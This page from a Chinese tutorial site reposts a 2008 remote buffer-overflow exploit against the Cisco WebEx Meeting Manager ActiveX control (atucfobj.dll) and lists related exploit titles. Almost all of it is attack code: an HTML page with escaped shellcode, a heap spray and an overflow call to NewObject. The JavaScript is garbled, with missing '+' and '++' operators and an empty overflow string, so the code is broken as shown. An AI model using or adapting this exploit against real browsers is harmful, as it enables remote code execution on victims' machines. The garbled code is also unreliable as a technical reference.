手机
当前位置:查字典教程网 >网络安全 >Exploit >Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
摘要://k`sOSe08/08/2008//testedinIE6,XPSP1varshellcode=unescape("%ue8fc%u00...

<html>

<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />

</object> <script language=javascript> // k`sOSe 08/08/2008

// tested in IE6, XP SP1

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");

while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;

for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;

for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>

</html>

【Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit】相关文章:

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

MS Internet Explorer (FTP Server Response) DoS Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

精品推荐
分类导航